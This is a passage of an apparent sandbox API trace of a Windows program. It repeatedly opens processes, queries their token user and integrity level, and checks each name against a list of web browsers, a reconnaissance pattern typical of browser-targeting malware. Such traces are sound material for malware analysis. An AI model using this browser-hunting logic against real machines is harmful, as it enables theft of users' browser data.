DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.158] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.159] GetLastError () returned 0x7a [0239.159] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.159] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.159] CloseHandle (hObject=0x340) returned 1 [0239.159] CloseHandle (hObject=0x548) returned 1 [0239.159] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.159] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.159] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.159] GetLastError () returned 0x7a [0239.160] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.160] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.160] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.160] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0239.160] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0239.160] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0239.160] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0239.160] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0239.160] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0239.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0239.160] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.161] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.161] GetLastError () returned 0x7a [0239.161] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.161] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.161] CloseHandle (hObject=0x340) returned 1 [0239.161] CloseHandle (hObject=0x548) returned 1 [0239.161] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.161] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.162] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.162] GetLastError () returned 0x7a [0239.162] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.162] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.162] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.162] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.162] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0239.162] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.162] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.162] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.162] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0239.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0239.163] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.163] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.163] GetLastError () returned 0x7a [0239.163] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.163] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.163] CloseHandle (hObject=0x340) returned 1 [0239.163] CloseHandle (hObject=0x548) returned 1 [0239.164] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.164] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.164] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.164] GetLastError () returned 0x7a [0239.164] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.164] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.164] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.164] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0239.164] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0239.164] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0239.165] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0239.165] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0239.165] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0239.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0239.165] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.165] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.165] GetLastError () returned 0x7a [0239.165] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.165] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.165] CloseHandle (hObject=0x340) returned 1 [0239.166] CloseHandle (hObject=0x548) returned 1 [0239.166] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.166] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.166] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.166] GetLastError () returned 0x7a [0239.166] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.166] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.166] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.166] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.167] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0239.167] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.167] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.167] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.167] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0239.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0239.167] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.167] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.167] GetLastError () returned 0x7a [0239.167] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.167] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.168] CloseHandle (hObject=0x340) returned 1 [0239.168] CloseHandle (hObject=0x548) returned 1 [0239.168] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.168] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.168] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.168] GetLastError () returned 0x7a [0239.168] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.168] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.169] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.169] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.169] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0239.169] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.169] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.169] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.169] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0239.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0239.169] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.169] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.169] GetLastError () returned 0x7a [0239.170] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.170] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.170] CloseHandle (hObject=0x340) returned 1 [0239.170] CloseHandle (hObject=0x548) returned 1 [0239.170] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.170] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.170] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.170] GetLastError () returned 0x7a [0239.170] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.171] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.171] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.171] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0239.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0239.171] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.171] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.172] GetLastError () returned 0x7a [0239.172] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.172] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.172] CloseHandle (hObject=0x340) returned 1 [0239.172] CloseHandle (hObject=0x548) returned 1 [0239.172] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.172] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.172] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.172] GetLastError () returned 0x7a [0239.172] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.172] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.173] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.173] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0239.173] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0239.173] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0239.173] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0239.173] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0239.173] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0239.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0239.173] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.173] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.173] GetLastError () returned 0x7a [0239.173] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.173] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.173] CloseHandle (hObject=0x340) returned 1 [0239.174] CloseHandle (hObject=0x548) returned 1 [0239.174] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.174] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.174] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.174] GetLastError () returned 0x7a [0239.174] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.174] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.174] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.174] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0239.174] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0239.174] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0239.174] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0239.174] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0239.174] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0239.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0239.175] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.175] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.175] GetLastError () returned 0x7a [0239.175] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.175] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.175] CloseHandle (hObject=0x340) returned 1 [0239.175] CloseHandle (hObject=0x548) returned 1 [0239.175] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.175] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.175] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.175] GetLastError () returned 0x7a [0239.175] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.176] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.176] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.176] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0239.176] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0239.176] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0239.176] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0239.176] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0239.176] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0239.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0239.176] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, 